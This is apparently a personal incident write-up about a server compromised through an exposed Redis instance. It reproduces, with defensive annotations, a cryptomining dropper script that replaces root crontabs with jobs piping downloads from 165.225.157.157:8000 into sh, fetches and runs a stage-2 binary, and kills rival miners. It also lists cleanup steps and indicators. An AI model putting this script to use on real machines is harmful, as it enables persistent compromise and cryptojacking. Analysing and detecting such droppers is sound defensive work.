攻击者 IP(恶意脚本的下载地址):
http://165.225.157.157:8000/i.sh
# Dropper script served as i.sh from http://165.225.157.157:8000, kept verbatim
# and annotated for incident response. Every path and host it touches is an
# indicator to check on a suspected machine: both root crontab files below,
# /tmp/ddgs.3010, and outbound requests to 165.225.157.157:8000.
#
# Extends PATH before anything else — presumably so curl/wget/ps/awk resolve
# when the script is re-run from cron, whose environment is minimal (inference;
# the script itself does not say why).
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# Persistence, RHEL/CentOS crontab location. `>` REPLACES root's crontab, so any
# legitimate root jobs are destroyed and replaced by a job that re-downloads and
# executes i.sh every 5 minutes; the second line appends a wget fallback for
# hosts without curl. Cleanup has to remove these entries (or the whole file)
# before killing the payload, otherwise the job simply re-infects the host.
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
# Same persistence for the Debian/Ubuntu crontab location. `mkdir -p` creates the
# directory even on distributions that do not use it, so both files can exist on
# one host — check both when cleaning up.
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
# Stage-2 payload: an architecture-specific binary (`uname -m` selects the
# variant on the server side) is fetched to /tmp/ddgs.3010, but only when no file
# of that name exists yet. The existence check is the only "already installed"
# test the script makes; it does not verify the file's contents.
if [ ! -f "/tmp/ddgs.3010" ]; then
curl -fsSL http://165.225.157.157:8000/static/3010/ddgs.$(uname -m) -o /tmp/ddgs.3010
fi
# Executes the payload (only if chmod succeeded). The writeup below lists
# /tmp/imWBR1 as the miner, so ddgs.3010 may be a loader that drops further
# files — confirm from the binary rather than assuming a single artifact.
chmod +x /tmp/ddgs.3010 && /tmp/ddgs.3010
# Competitor cleanup: kills every process whose `ps` command line contains one
# of these strings (other miner names, public mining pools, a /boot/efi/ path).
# For defenders the same strings, and the
# `ps auxf | grep -v grep | grep … | xargs kill` pattern itself, are cheap
# detection signatures in shell history, cron logs and EDR telemetry.
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
# The next two lines were already commented out in the captured sample (they
# also pipe into `kill` directly instead of `xargs kill`, so they would not have
# worked as written). Kept as-is because the names are still useful indicators.
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
不过这个黑产倒没有搞什么破坏,只是用你的机器对外发起攻击,外加挖矿……阿里报了 200 多条警告才去处理(因为服务器快到期,加上懒的原因)
原因也查出来了:Redis 数据库配置不当——之前学习数据库的时候把它对外开放了,被人利用 Redis 提了权。
处理方法
结束进程,清除定时任务,修复漏洞;Redis 因为已经用不上,就直接删除了。
嗯,
/root/.ssh/authorized_keys 里有一个用于免密登录的公钥,把它删除,然后修改密码。
挖矿程序
- 恶意文件路径: /tmp/imWBR1
- 恶意文件md5: 9ebf7fc39efe7c553989d54965ebb468
基本上问题就处理完毕了